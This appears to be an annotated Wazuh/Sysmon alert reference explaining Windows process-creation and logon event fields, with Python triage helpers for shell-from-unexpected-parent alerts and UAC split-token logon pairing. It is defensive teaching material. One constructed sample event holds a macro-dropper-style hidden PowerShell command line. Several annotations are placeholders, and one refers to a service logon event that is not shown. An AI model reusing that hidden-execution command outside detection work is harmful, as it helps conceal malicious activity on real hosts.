rule.mitre.id: ['T1059.003'] List of ATT&CK technique IDs the rule maps to; T1059.003 is Windows Command Shell. Execution and persistence techniques (T1059, T1105, T1547) deserve a prompt look, but read the parent and command line before escalating: the mapping describes what the rule watches for, not what this event proves.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Windows Command Shell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534985.2415577 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider. Microsoft-Windows-Sysmon is the Sysmon service/driver, the richest process-creation source on Windows.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Sysmon's provider GUID.
data.win.system.eventID: 1 Sysmon Event ID 1 = Process Create. Sysmon has its own numbering (1 process create, 3 network connect, 11 file create, ...); do not confuse it with Security log IDs.
data.win.system.version: 5 Schema version of Sysmon's Process Create template; version 5 is the one that includes the ParentUser line shown here.
data.win.system.level: 4 Level 4 = Informational.
data.win.system.task: 1 Windows task category; Sysmon reuses the event ID as the task (1 = Process Create).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows. Sysmon sets only the reserved top bit, so there is nothing to filter on here.
data.win.system.systemTime: 2025-04-24T22:48:59.7576790Z Time the event was written, UTC. Compare with eventdata.utcTime (22:48:59.088), when Sysmon observed the process start; the two differ by well under a second here.
data.win.system.eventRecordID: 344372 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service that wrote the event, not of the created process; the child PID is in eventdata.processId.
data.win.system.threadID: 4740 Sysmon thread that wrote the event. Rarely useful.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel. Wazuh only sees it if this channel is listed as a localfile of type eventchannel in the agent configuration.
data.win.system.computer: Attacker Hostname recorded by Windows itself. Should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity derived by the Wazuh decoder from the level.
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:48:59.088
ProcessGuid: {94294ddc-bfdb-680a-a50c-000000000e00}
ProcessId: 3372
Image: C:\Windows\System32\cmd.exe
FileVersion: 10.0.26100.3624 (WinBuild.160101.0800)
Description: Windows Command Processor
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: Cmd.Exe
CommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat""
CurrentDirectory: C:\WINDOWS\system32\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=6EEF334D826BE3DC737BB30FBE84B69E529AAB956EC33D714B5A75276A58ED04
ParentProcessGuid: {94294ddc-ea88-67fe-4800-000000000e00}
ParentProcessId: 3220
ParentImage: C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
ParentCommandLine: "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:48:59.088 Process start time as observed by Sysmon (UTC, millisecond precision).
data.win.eventdata.processGuid: {94294ddc-bfdb-680a-a50c-000000000e00} Sysmon's process GUID: stable across PID reuse and reboots, unlike the PID. The middle groups encode the start time as a byte-swapped Unix timestamp (bfdb-680a = 0x680abfdb = 22:48:59 UTC, matching utcTime). Use it to join with Sysmon events 3, 7, 10 and 11 for the same process.
data.win.eventdata.processId: 3372 PID of the new process (decimal). PIDs are reused; prefer processGuid for joins.
data.win.eventdata.image: C:\\Windows\\System32\\cmd.exe Full path of the executable. The doubled backslashes are JSON escaping by the decoder, not part of the path.
data.win.eventdata.fileVersion: 10.0.26100.3624 (WinBuild.160101.0800) File version from the PE version resource; 10.0.26100 is the Windows 11 24H2 / Server 2025 build line.
data.win.eventdata.description: Windows Command Processor Description string from the PE version resource.
data.win.eventdata.product: Microsoft® Windows® Operating System Product string from the PE version resource.
data.win.eventdata.company: Microsoft Corporation Company string from the PE version resource. Trivially forged in a malicious PE; the hash is the authoritative check.
data.win.eventdata.originalFileName: Cmd.Exe OriginalFileName from the version resource. Compare with the image name: a mismatch (cmd.exe copied to svchost.exe, say) is a classic evasion tell; here they agree.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\" Full command line: cmd.exe /c running VMware Tools' resume-vm-default.bat, the script VMware Tools executes when the guest resumes. The doubled quotes are cmd's own quoting of a quoted path.
data.win.eventdata.currentDirectory: C:\\WINDOWS\\system32\\ Working directory of the new process.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM Account the new process runs as.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} Sysmon's logon GUID for the session; the e703 group is the logon ID 0x3e7 byte-swapped. Joins to other Sysmon events of the same session, not to the Security log's Logon GUID.
data.win.eventdata.logonId: 0x3e7 Logon session ID; 0x3E7 is the SYSTEM session, the same value as targetLogonId in the 4624 service logon above. This is the join key between Sysmon and the Security log.
data.win.eventdata.terminalSessionId: 0 Session 0 is the non-interactive services session. A cmd.exe in session 0 is a service or scheduled action, not a user typing.
data.win.eventdata.integrityLevel: System Integrity level of the process token (Low, Medium, High, System).
data.win.eventdata.hashes: SHA256=6EEF334D826BE3DC737BB30FBE84B69E529AAB956EC33D714B5A75276A58ED04 Hash of the image on disk (algorithms per Sysmon config; SHA256 here). Verify against a known-good cmd.exe for this build rather than trusting the version-resource fields.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4800-000000000e00} Sysmon GUID of the parent; its timestamp groups (ea88-67fe) put the parent's start days earlier, i.e. a long-running service.
data.win.eventdata.parentProcessId: 3220 PID of the parent process.
data.win.eventdata.parentImage: C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe Parent executable. vmtoolsd.exe is the VMware Tools service; the rule fired because cmd.exe's parent is not one of the parents it expects (a desktop shell, a terminal or another shell).
data.win.eventdata.parentCommandLine: \"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\" Command line of the parent; a plain service start with no arguments.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM Account of the parent process. Parent and child are both SYSTEM, so no privilege change occurred; this is a SYSTEM service running a vendor script, a true positive for the rule but a benign one.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
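Triage logic for the Sysmon Event ID 1 alert above, as an added example and not Wazuh's own rule 92052 (whose exact conditions are not shown on this page): a simplified "shell from an unexpected parent" check with a tuning allowlist keyed on the exact parent image and command line, so the VMware Tools resume script is suppressed while a shell from the same parent with a different command line, a shell spawned by an Office process, or a renamed cmd.exe still surfaces. The expected-parent set, the verdict names and the extra sample events are assumptions constructed for the example; the first sample reproduces the field values from the alert.

```python
import ntpath

# Shells whose OriginalFileName (PE version resource) matches the image name.
SHELLS = {"cmd.exe", "powershell.exe"}

# Parents from which a shell is unremarkable. Assumption: tune per estate.
EXPECTED_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe",
                    "windowsterminal.exe", "conhost.exe"}

# Known-benign automation, keyed on the exact (parent image, command line)
# pair in lower case. The entry below is the VMware Tools resume script from
# the alert above; anything else spawned by vmtoolsd.exe is NOT covered.
VMWARE_RESUME = (
    r"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe",
    r'C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat""',
)
ALLOWLIST = {tuple(s.lower() for s in VMWARE_RESUME)}


def _name(path: str) -> str:
    """Lower-case file name from a Windows path; ntpath works on any OS."""
    return ntpath.basename(path).lower()


def triage(ev: dict) -> tuple[str, str]:
    """Return (verdict, reason) for one Sysmon EID 1 event.

    ev uses the data.win.eventdata.* key names as Wazuh decodes them,
    with string values as they arrive from the decoder.
    """
    image, parent = _name(ev["image"]), _name(ev["parentImage"])
    original = ev.get("originalFileName", "").lower()
    if image not in SHELLS and original not in SHELLS:
        return "ignore", f"{image} is not a shell"

    # On-disk name differs from the version resource: a renamed shell.
    # That is evasion, so escalate regardless of the parent.
    if original and original != image:
        return "escalate", f"{image} is a renamed {original}"

    if parent in EXPECTED_PARENTS:
        return "ignore", f"expected parent {parent}"

    if (ev["parentImage"].lower(), ev["commandLine"].lower()) in ALLOWLIST:
        return "suppress", "allowlisted vendor automation"

    # SYSTEM shell in session 0 from an unknown parent: the usual shape of
    # service or scheduled-task abuse for persistence or privilege escalation.
    if str(ev.get("terminalSessionId")) == "0" and ev.get("user", "").upper().endswith("\\SYSTEM"):
        return "escalate", f"SYSTEM shell in session 0 from {parent}"

    return "investigate", f"shell from unexpected parent {parent}"


# Sample events (constructed). ALERT_EVENT reproduces the alert's field values.
ALERT_EVENT = {
    "image": r"C:\Windows\System32\cmd.exe",
    "originalFileName": "Cmd.Exe",
    "commandLine": VMWARE_RESUME[1],
    "user": r"NT AUTHORITY\SYSTEM",
    "terminalSessionId": "0",
    "parentImage": VMWARE_RESUME[0],
}
# Same parent, different script: the allowlist must not cover it.
VMTOOLS_OTHER = dict(ALERT_EVENT,
                     commandLine=r'C:\WINDOWS\system32\cmd.exe /c "C:\Users\Public\update.bat"')
# Macro-dropper shape: a shell from an Office process in a user session.
OFFICE_CHILD = {
    "image": r"C:\Windows\System32\cmd.exe",
    "originalFileName": "Cmd.Exe",
    "commandLine": r'cmd.exe /c "powershell -nop -w hidden"',
    "user": r"ATTACKER\Attcker1",
    "terminalSessionId": "1",
    "parentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
}
# cmd.exe copied to a benign-looking name and launched from Explorer.
RENAMED = dict(OFFICE_CHILD, image=r"C:\Users\Public\svchost.exe",
               parentImage=r"C:\Windows\explorer.exe")

if __name__ == "__main__":
    for label, ev in [("alert", ALERT_EVENT), ("vmtools-other", VMTOOLS_OTHER),
                      ("office", OFFICE_CHILD), ("renamed", RENAMED)]:
        print(f"{label:14} {triage(ev)}")
```

The allowlist is deliberately exact-match on the full command line rather than on the parent alone: the point of the rule is that vmtoolsd.exe spawning cmd.exe is unusual, and suppressing every child of vmtoolsd.exe would hide an attacker who hijacks that service.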
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534985.2421197 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing ETW provider that wrote the event; the Security log's audit provider.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} Provider GUID of Microsoft-Windows-Security-Auditing.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). 4624 = an account was successfully logged on.
data.win.system.version: 3 Schema version of the 4624 template; check it before parsing by field position.
data.win.system.level: 0 Level 0 = LogAlways; audit events always carry it, the outcome is in the keywords.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.); 12544 = Logon.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows; 0x8020000000000000 = Audit Success.
data.win.system.systemTime: 2025-04-24T22:49:18.8658034Z Time the event was written, UTC with 100 ns resolution. The next record (43983) is written within 40 microseconds of this one: the two are the halves of one UAC split-token sign-in.
data.win.system.eventRecordID: 43982 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 PID of the emitting process, lsass.exe for the Security log.
data.win.system.threadID: 9532 Thread inside lsass.exe that wrote the event. Rarely useful.
data.win.system.channel: Security Event log channel; the audit log.
data.win.system.computer: Attacker Hostname recorded by Windows itself. Should match agent.name.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity derived by the Wazuh decoder from the keywords.
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 2
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002
Account Name: Attcker1
Account Domain: Attacker
Logon ID: 0x31B4686
Linked Logon ID: 0x31C1A7D
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x624
Process Name: C:\Windows\System32\svchost.exe
Network Information:
Workstation Name: ATTACKER
Source Network Address: 127.0.0.1
Source Port: 0
Detailed Authentication Information:
Logon Process: User32
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 SID of the account that requested the logon; S-1-5-18 is LOCAL SYSTEM.
data.win.eventdata.subjectUserName: ATTACKER$ Requesting account; the computer account (trailing $), i.e. SYSTEM on a workgroup host.
data.win.eventdata.subjectDomainName: WORKGROUP Authority of the requester; the host is not domain-joined.
data.win.eventdata.subjectLogonId: 0x3e7 Logon session of the requester; 0x3E7 is the SYSTEM session.
data.win.eventdata.targetUserSid: S-1-5-21-1227732096-2714569048-1995468811-1002 SID of the logged-on account. S-1-5-21-<machine>-1002 is a local account on this host; RIDs of 1000 and above are user-created (500 is the built-in Administrator).
data.win.eventdata.targetUserName: Attcker1 Account that was logged on, spelled as it exists on the host.
data.win.eventdata.targetDomainName: Attacker Authority of the account. It equals the hostname, so this is a local SAM account, not a domain user.
data.win.eventdata.targetLogonId: 0x31b4686 Logon ID of the new session; join key to 4688/4634 and to Sysmon's LogonId.
data.win.eventdata.logonType: 2 Numeric logon type. 2 = Interactive (console). With User32 as logon process and source 127.0.0.1 this is a local console sign-in, not a remote session (RDP would be type 10).
data.win.eventdata.logonProcessName: User32 User32 is the logon process name for winlogon-driven interactive sign-ins (the sign-in screen).
data.win.eventdata.authenticationPackageName: Negotiate Authentication package. Negotiate picks Kerberos when a KDC is reachable and otherwise NTLM; here a local SAM account on a workgroup host.
data.win.eventdata.workstationName: ATTACKER Workstation the logon came from as reported by the client; for a local logon it is the host itself.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} Logon GUID; all zeros because no Kerberos ticket is involved, so there is no KDC event to correlate.
data.win.eventdata.keyLength: 0 Session key length in bits. 0 means no session key was requested, normal for a local logon; it is not a weak-key indicator here.
data.win.eventdata.processId: 0x624 PID (hex) of the requesting process; 0x624 = 1572.
data.win.eventdata.processName: C:\\Windows\\System32\\svchost.exe Image of the process that called the logon API on the user's behalf. Console sign-ins are usually requested by winlogon.exe; a different caller such as this svchost.exe is worth a 4688/Sysmon lookup of PID 1572 to see which service hosted it.
data.win.eventdata.ipAddress: 127.0.0.1 Source address. Loopback on a type 2 logon means the request originated on the local console path; a routable address on type 2 or 10 is what to chase. '-' is normal for service logons.
data.win.eventdata.ipPort: 0 Source port; 0 when no network socket was involved.
data.win.eventdata.impersonationLevel: %%1833 Resource-string code; %%1833 renders as Impersonation.
data.win.eventdata.virtualAccount: %%1843 Resource-string code; %%1843 renders as No.
data.win.eventdata.targetLinkedLogonId: 0x31c1a7d Logon ID of the other half of this UAC split-token session. This elevated session (0x31b4686) links to the filtered one (0x31c1a7d) and vice versa: two 4624s, one sign-in by Attcker1. Group them in the timeline.
data.win.eventdata.elevatedToken: %%1842 %%1842 renders as Yes: this is the full-administrator half of the pair, which also tells you Attcker1 is in the local Administrators group. Processes launched through a UAC prompt carry this Logon ID.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
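Triage helpers for the 4624 events on this page (the type 5 service logon by SYSTEM above, and the type 2 logon for Attcker1 whose Linked Logon ID 0x31C1A7D points at the second 4624 that follows), as an added example rather than Wazuh or Microsoft code. It resolves the %%-coded eventdata values, names the logon type, flags a service logon that was not requested by the Service Control Manager, and pairs the two halves of a UAC split-token sign-in by their cross-referenced Linked Logon IDs. The sample events are constructed from the field values shown here; the RDP sample, the TEST-NET address and the verdict strings are assumptions.

```python
# Logon types as numbered in 4624 (the subset that matters on workstations).
LOGON_TYPES = {2: "Interactive", 3: "Network", 4: "Batch", 5: "Service",
               7: "Unlock", 8: "NetworkCleartext", 9: "NewCredentials",
               10: "RemoteInteractive", 11: "CachedInteractive"}

# Windows resource-string codes that the decoder leaves unresolved.
RESOURCE_STRINGS = {"%%1832": "Identification", "%%1833": "Impersonation",
                    "%%1840": "Delegation", "%%1841": "Anonymous",
                    "%%1842": "Yes", "%%1843": "No"}

SCM = r"c:\windows\system32\services.exe"      # Service Control Manager
LOCAL_SOURCES = {"-", "127.0.0.1", "::1"}       # no network path involved


def logon_id(value: str) -> int:
    """Normalize a hex Logon ID; Wazuh lower-cases it, the message does not."""
    return int(value, 16)


def decode(ev: dict) -> dict:
    """Analyst-facing view of one 4624 eventdata dict (string values as decoded)."""
    ltype = int(ev["logonType"])
    return {
        "user": ev["targetDomainName"] + "\\" + ev["targetUserName"],
        "logon_id": logon_id(ev["targetLogonId"]),
        "linked_id": logon_id(ev.get("targetLinkedLogonId", "0x0")),
        "logon_type": LOGON_TYPES.get(ltype, f"unknown({ltype})"),
        "elevated": RESOURCE_STRINGS.get(ev.get("elevatedToken", "")) == "Yes",
        "impersonation": RESOURCE_STRINGS.get(ev.get("impersonationLevel", ""), "?"),
        "caller": ev["processName"].lower(),
        "source": ev.get("ipAddress", "-"),
    }


def classify(ev: dict) -> str:
    """One-line triage verdict for a single 4624."""
    d = decode(ev)
    if d["logon_type"] == "Service":
        if d["caller"] == SCM:
            return "service logon via SCM (baseline)"
        return f"service logon requested by {d['caller']} (not SCM, investigate)"
    if d["logon_type"] in ("Interactive", "Unlock"):
        if d["source"] in LOCAL_SOURCES:
            return "local console logon"
        return f"console logon with remote source {d['source']} (unexpected)"
    if d["logon_type"] == "RemoteInteractive":
        return f"RDP logon from {d['source']}"
    return f"{d['logon_type']} logon from {d['source']}"


def pair_split_tokens(events: list[dict]) -> list[tuple[str, str, str]]:
    """Find UAC split-token sign-ins: two 4624s whose Linked Logon IDs point
    at each other, one with Elevated Token Yes and one with No.
    Returns (user, elevated_logon_id, filtered_logon_id) per pair."""
    by_id = {d["logon_id"]: d for d in map(decode, events)}
    pairs = []
    for d in by_id.values():
        other = by_id.get(d["linked_id"])
        if (other and other["linked_id"] == d["logon_id"]
                and d["elevated"] and not other["elevated"]):
            pairs.append((d["user"], hex(d["logon_id"]), hex(other["logon_id"])))
    return sorted(pairs)


# Constructed samples. The first three reproduce the field values of the 4624s
# on this page; the elevatedToken of FILTERED_HALF is taken from the
# "Elevated Token: No" line of its rendered message.
SERVICE_LOGON = {
    "targetUserName": "SYSTEM", "targetDomainName": "NT AUTHORITY",
    "targetLogonId": "0x3e7", "targetLinkedLogonId": "0x0", "logonType": "5",
    "elevatedToken": "%%1842", "impersonationLevel": "%%1833",
    "processName": r"C:\Windows\System32\services.exe",
}
ELEVATED_HALF = {
    "targetUserName": "Attcker1", "targetDomainName": "Attacker",
    "targetLogonId": "0x31b4686", "targetLinkedLogonId": "0x31c1a7d",
    "logonType": "2", "elevatedToken": "%%1842", "impersonationLevel": "%%1833",
    "processName": r"C:\Windows\System32\svchost.exe", "ipAddress": "127.0.0.1",
}
FILTERED_HALF = dict(ELEVATED_HALF, targetLogonId="0x31c1a7d",
                     targetLinkedLogonId="0x31b4686", elevatedToken="%%1843")
# Assumed extra case: an RDP logon from a TEST-NET-3 address.
RDP_LOGON = dict(ELEVATED_HALF, targetLogonId="0x4000001", targetLinkedLogonId="0x0",
                 logonType="10", ipAddress="203.0.113.5")

if __name__ == "__main__":
    for ev in (SERVICE_LOGON, ELEVATED_HALF, FILTERED_HALF, RDP_LOGON):
        print(hex(decode(ev)["logon_id"]), classify(ev))
    print(pair_split_tokens([SERVICE_LOGON, ELEVATED_HALF, FILTERED_HALF, RDP_LOGON]))
```

Pairing on the mutual Linked Logon ID, rather than on matching user and timestamp, is what keeps a split-token sign-in from being counted as two logons; the elevated Logon ID of the pair is the one to carry into 4688 and Sysmon searches for anything run through a UAC prompt.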
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534985.2428919 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing ETW provider that wrote the event; the Security log's audit provider.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} Provider GUID of Microsoft-Windows-Security-Auditing.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). 4624 = an account was successfully logged on.
data.win.system.version: 3 Schema version of the 4624 template; check it before parsing by field position.
data.win.system.level: 0 Level 0 = LogAlways; audit events always carry it, the outcome is in the keywords.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.); 12544 = Logon.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows; 0x8020000000000000 = Audit Success.
data.win.system.systemTime: 2025-04-24T22:49:18.8658429Z Time the event was written, UTC with 100 ns resolution; within 40 microseconds of record 43982, the other half of the same UAC split-token sign-in.
data.win.system.eventRecordID: 43983 Incremental log record number – handy for timeline order. Consecutive with the previous 4624 (43982).
data.win.system.processID: 792 PID of the emitting process, lsass.exe for the Security log.
data.win.system.threadID: 9532 Same lsass.exe thread as the previous 4624: both halves were written by one logon call.
data.win.system.channel: Security Event log channel; the audit log.
data.win.system.computer: Attacker Hostname recorded by Windows itself. Should match agent.name.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity derived by the Wazuh decoder from the keywords.
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 2
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: No
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002
Account Name: Attcker1
Account Domain: Attacker
Logon ID: 0x31C1A7D
Linked Logon ID: 0x31B4686
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x624
Process Name: C:\Windows\System32\svchost.exe
Network Information:
Workstation Name: ATTACKER
Source Network Address: 127.0.0.1
Source Port: 0
Detailed Authentication Information:
Logon Process: User32
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-21-1227732096-2714569048-1995468811-1002 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x31c1a7d No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: User32 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.workstationName: ATTACKER No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Length of the session key generated for this logon (e.g., 128‑bit); 0 means no session key was requested, as the message text notes. Unexpectedly short keys can point to a downgrade attack.
data.win.eventdata.processId: 0x624 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\svchost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.ipAddress: 127.0.0.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.ipPort: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x31b4686 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534986.2436639 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4634 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12545 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:49:18.8727048Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43985 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 17252 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
